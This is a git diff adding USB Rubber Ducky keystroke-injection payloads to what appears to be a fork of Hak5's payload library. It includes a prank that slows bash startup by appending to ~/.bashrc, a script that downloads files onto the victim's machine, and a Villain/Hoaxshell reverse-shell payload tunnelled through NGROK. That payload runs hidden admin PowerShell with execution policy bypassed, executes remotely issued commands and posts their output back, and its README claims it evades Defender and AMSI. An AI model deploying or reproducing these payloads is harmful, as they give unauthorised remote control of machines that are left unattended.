Merge branch 'hak5:master' into master
|
@ -80,7 +80,7 @@ STRING $SMTPInfo.Send($ReportEmail)
|
|||
ENTER
|
||||
REM Delete Log.txt and exit
|
||||
DELAY 3000
|
||||
STRING del Log.txt
|
||||
STRINGLN del Log.txt
|
||||
DELAY 500
|
||||
STRING exit
|
||||
STRINGLN exit
|
||||
ENTER
|
||||
|
|
|
@ -0,0 +1,68 @@
|
|||
REM TITLE: Deshellerator
|
||||
REM AUTHOR: Korben, Darren
|
||||
REM VERSION: 1.0
|
||||
|
||||
REM DESCRIPTION: "Slow down there buckaroo" - Shell Decelerator
|
||||
REM Every time a shell is opened (that sources ~/.bashrc), opening the next
|
||||
REM shell will get ever so slightly slower...
|
||||
|
||||
REM TARGETS: Linux - tested on ubuntu
|
||||
REM REQUIREMENTS: DuckyScript 3, PayloadStudio >1.3
|
||||
|
||||
DEFINE #TARGET_FILE ~/.bashrc
|
||||
DEFINE #DECELERATION_RATE 0.5
|
||||
|
||||
REM Delay used for waiting for GUI elements to spawn/react
|
||||
REM Increase to make more compatible with all systems
|
||||
DEFINE #UI_DELAY 250
|
||||
|
||||
LED_OFF
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.0
|
||||
|
||||
REM Windows fully passive OS Detection and passive Detect Ready
|
||||
REM Includes its own passive detect ready. Does not require
|
||||
REM additional extensions
|
||||
|
||||
REM USAGE:
|
||||
REM Extension runs inline (here)
|
||||
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
REM boot delay
|
||||
REM $_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE MAX_WAIT 150
|
||||
DEFINE CHECK_INTERVAL 20
|
||||
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE NOT_WINDOWS 7
|
||||
|
||||
VAR $MAX_TRIES = MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
ELSE
|
||||
$_OS = NOT_WINDOWS
|
||||
END_IF
|
||||
|
||||
REM EXAMPLE USAGE AFTER EXTENSION
|
||||
REM IF ($_OS == WINDOWS) THEN
|
||||
REM STRING HELLO WINDOWS!
|
||||
REM ELSE
|
||||
REM STRING HELLO WORLD!
|
||||
REM END_IF
|
||||
END_EXTENSION
|
||||
|
||||
REM Inapplicable target guard clause
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
ATTACKMODE OFF
|
||||
LED_R
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
|
||||
CTRL ALT t
|
||||
DELAY #UI_DELAY
|
||||
STRINGLN echo "echo 'sleep #DECELERATION_RATE'>>#TARGET_FILE">>#TARGET_FILE;exit
|
||||
LED_G
|
|
@ -0,0 +1,42 @@
|
|||
REM PUBLIC-SERVICE-ANNOUCEMENT
|
||||
REM (or (EAS)ter-eggs)
|
||||
REM By Lumen
|
||||
REM Warns the user of the danger of ducks!
|
||||
DEFINE EGG1 example.com/egg1.png
|
||||
DEFINE EGG2 example.com/egg2.png
|
||||
DEFINE EGG3 example.com/egg3.png
|
||||
DEFINE EGG4 example.com/egg5.png
|
||||
DEFINE TEXTFILE example.com/a_friendly_psa.txt
|
||||
REM See below for how to configure these URLs
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 300
|
||||
STRING powershell
|
||||
DELAY 300
|
||||
ENTER
|
||||
DELAY 600
|
||||
STRING Invoke-WebRequest -Uri "
|
||||
STRING TEXTFILE
|
||||
STRING " -OutFile "~\Desktop\a_friendly_psa.txt"; Invoke-WebRequest -Uri "
|
||||
STRING EGG1
|
||||
STRING " -OutFile "~\Documents\egg1.png"; Invoke-WebRequest -Uri "
|
||||
STRING EGG2
|
||||
STRING " -OutFile "~\Pictures\egg2.png"; Invoke-WebRequest -Uri "
|
||||
STRING EGG3
|
||||
STRING " -OutFile "~\Documents\My Games\egg3.png"; Invoke-WebRequest -Uri "
|
||||
STRING EGG4
|
||||
STRING " -OutFile "~\Downloads\egg5.png"; & ~\Desktop\a_friendly_psa.txt
|
||||
ENTER
|
||||
REM This script makes heavy use of the Invoke-WebRequest command, which
|
||||
REM gathers a webpage and optionally saves it
|
||||
REM Here, we use it to give the user a nice warning about security :D
|
||||
REM This script hides 4 eggs, gives a little warning, and may
|
||||
REM or may not send them on a quest for a mythical 5th egg ¯\_(ツ)_/¯
|
||||
REM These statements can be removed to save on space, and the links above
|
||||
REM can be changed to short links to save on typing time
|
||||
|
||||
REM To set up the URLs for deployment, use a file share service to host
|
||||
REM the 4 images and text files that come with this payload.
|
||||
REM Any file share can be used as long as it offers a link
|
||||
REM directly to the file that can be saved or downloaded
|
||||
REM (for example, a dropbox link with ?dl=1 at the end)
|
|
@ -0,0 +1,24 @@
|
|||
So you left your computer unlocked...
|
||||
|
||||
Not a good idea! It only takes a few seconds of access to your computer
|
||||
download, install, and execute code! For example, someone could use a tool
|
||||
called a USB Rubber Ducky (https://shop.hak5.org/products/usb-rubber-ducky)
|
||||
to quickly inject code into your PC... which somebody already did!
|
||||
|
||||
If you're seeing this, it means someone plugged a device into your computer
|
||||
and used a piece of code called PUBLIC_SERVICE_ANNOUNCEMENT
|
||||
(https://github.com/Lumen-git/RubberDucky-PublicServiceAnnouncement)
|
||||
to warn you of the dangers of leaving your computer unlocked in a public space! Now, 5
|
||||
images of Easter Eggs have been downloaded to your computer. I'll give you a hint,
|
||||
the first is in "My Documents".
|
||||
|
||||
Just think if someone downloaded a crypto miner! Or uploaded all your files
|
||||
to the internet! Stay safe, and protect your PC!
|
||||
|
||||
|
||||
Computer Safety Tips (see #6!!): https://security.berkeley.edu/resources/best-practices-how-to-articles/top-10-secure-computing-tips
|
||||
Other USB attacks that could have happened: https://www.bleepingcomputer.com/news/security/heres-a-list-of-29-different-types-of-usb-attacks/
|
||||
|
||||
|
||||
Although the code was written my Lumen, they do not suggest its use on targets
|
||||
without permission, nor do they hold any responsibility for its use.
|
After Width: | Height: | Size: 26 KiB |
After Width: | Height: | Size: 46 KiB |
After Width: | Height: | Size: 25 KiB |
After Width: | Height: | Size: 21 KiB |
|
@ -0,0 +1,48 @@
|
|||
**Title: Hoaxshell via Villain Payload and NGROK Tunnel**
|
||||
|
||||
<p>Author: HackingMark<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.0<br>
|
||||
Requirements: DuckyScript 3.0, powershell, Linux Maschine with Villain, NGROK</p>
|
||||
|
||||
**What is Villain?**
|
||||
#
|
||||
*Villain is a Toolset to setup Payloads and Listener for Hoaxshell*
|
||||
*Hoaxshell is actually undetected by Windows Defender and the Payload is optimized to bypass AMSITrigger*
|
||||
*The Powershell Payload connects the target Machine back to the Hoaxshell Server, NGROK makes this Server reachable from the Internet. *
|
||||
*That way you can catch your session from everywhere. Once your session is established, you can open an interactive shell.*
|
||||
|
||||
|
||||
|
||||
**How to use this Payload**
|
||||
|
||||
First clone Villain from Repo:
|
||||
`git clone https://github.com/t3l3machus/Villain`
|
||||
Then install Requirements:
|
||||
`cd Villain`
|
||||
`pip install -r ./requirements.txt`
|
||||
Allow Villain to start:
|
||||
`chmod +x ./Villain.py`
|
||||
Fire it up:
|
||||
`./Villain.py`
|
||||
Generate a payload to get the session identifier:
|
||||
`generate os=windows lhost=0.0.0.0 lport=8080`
|
||||
![alt text](https://github.com/HackingMark/usbrubberducky-payloads/blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/media/villain.png)
|
||||
|
||||
Establish NGROK Tunnel forwarding Traffic to our Hoaxshell Engine
|
||||
`ngrok http 8080`
|
||||
![alt text](https://github.com/HackingMark/usbrubberducky-payloads/blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/media/ngrok1.png)
|
||||
Leave this Window open
|
||||
![alt text](https://github.com/HackingMark/usbrubberducky-payloads/blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/media/ngrok2.png)
|
||||
|
||||
**Preparing the Payload:**
|
||||
You need 2 Values from above: NGROK HTTPS Link and Session Identifier from Villain
|
||||
Put it into the Payload then compile it to inject.bin and download.
|
||||
![alt text](https://github.com/HackingMark/usbrubberducky-payloads/blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/media/payloadstudio.png)
|
||||
|
||||
Copy your Inject.bin to your Ducky!
|
||||
|
||||
<p>Plug your Ducky into a Windows target.<br>
|
||||
Achieve reverse shell.<br>
|
||||
open a shell with </p>
|
||||
`shell SESSION-ID`
|
After Width: | Height: | Size: 103 KiB |
After Width: | Height: | Size: 133 KiB |
After Width: | Height: | Size: 161 KiB |
After Width: | Height: | Size: 160 KiB |
|
@ -0,0 +1,42 @@
|
|||
REM Villain Shell via NGROK
|
||||
REM HackingMark
|
||||
REM DESCRIPTION This Script spawns a Admin Powershellwindow and executes the Villain Payload throug an NGROK Tunnel in the Background(Win10)/minimized(Win11)
|
||||
|
||||
REM Villain Hoaxshell by T3l3machus on Github: https://github.com/t3l3machus/Villain
|
||||
REM What to do before: Start Villain.py on your System and create a Payload (generate os=windows lhost=0.0.0.0 lport=8080) to get the $i value
|
||||
REM take the generated Value from $i and paste it in line 11-13
|
||||
REM Start Ngrok Tunnel (ngrok http 8080)
|
||||
REM Put your NGROK HTTPS Link here
|
||||
DEFINE #NGROK Example.com
|
||||
REM Split your Sessionnumber into 3 parts eg $i='4ba4f358-322d5df5-f4516c91'
|
||||
DEFINE #SN1 4ba4f358
|
||||
DEFINE #SN2 322d5df5
|
||||
DEFINE #SN3 f4516c91
|
||||
|
||||
|
||||
DELAY 2000
|
||||
GUI x
|
||||
DELAY 200
|
||||
STRING a
|
||||
DELAY 500
|
||||
ALT j
|
||||
REM The Part above needs to be adapted to your language, code is for German System Layouts
|
||||
DELAY 1000
|
||||
STRING powershell -w h -NoP -NonI -ep Bypass -C {$s='
|
||||
STRING #NGROK
|
||||
STRING ';$i='
|
||||
STRING #SN1
|
||||
STRING -
|
||||
STRING #SN2
|
||||
STRING -
|
||||
STRING #SN3
|
||||
STRING ';$p='h'+'ttps://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/
|
||||
STRING #SN1
|
||||
STRING /$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/
|
||||
STRING #SN2
|
||||
SPACE
|
||||
STRING -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"});if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/
|
||||
STRING #SN3
|
||||
SPACE
|
||||
STRING -Method POST -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}}
|
||||
ENTER
|